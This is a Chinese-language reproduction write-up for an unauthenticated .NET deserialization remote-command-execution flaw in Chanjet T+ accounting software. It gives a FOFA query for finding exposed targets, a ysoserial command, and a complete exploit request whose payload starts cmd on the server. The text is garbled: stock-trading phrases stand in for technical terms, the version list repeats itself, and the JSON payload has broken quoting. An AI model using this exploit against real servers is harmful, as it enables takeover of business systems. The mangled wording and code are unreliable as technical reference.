畅捷通T 它是一种基于互联网的新型企业管理软件,其功能模块包括:财务管理、采购管理、库存管理等。它主要集成了社会化、移动化、物联网、电子商务、互联网信息订阅等元素。
畅捷通T 存在.net反通达信股本接口,序列化漏洞,未经认证的攻击者可以通过构建恶意通达信股本接口,序列化请求在目标服务器上执行任何命令。
0x03影响范围
畅捷通T 10
畅捷通T 10
0x04复现环境
FOFA:app="畅捷通-TPlus"
0x05漏洞复现
该漏洞属于.JavaScriptSerializer反序列化在net反序列化场景中;
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: your-ip
X-Ajaxpro-Method: GetStoreWarehouseByStore
{
"storeID":{}
}
PS:X-Ajaxpro-Method:指定Ajax请求中要调用的服务器端方法的名称
如果出现这种情况,就会有漏洞
使用ysoserial使用.paylodadet工具结构
./ysoserial.exe -f JavaScriptSerializer -g ObjectDataProvider -c “执行命令”
将生成的序列化数据加载到POC
exp:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: your-ip
X-Ajaxpro-Method: GetStoreWarehouseByStore
{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35,
"MethodName":"Start",
"ObjectInstance":{
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089,
"StartInfo": {
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089,
"FileName":"cmd", "Arguments":"/c 执行命令“
}
}
}
}
0x06修复建议
目前,官方已发布补丁更新,建议受影响的用户尽快安装。
T 1000.000.0283及以上补丁包:
文章为作者独立观点,不代表股票交易接口观点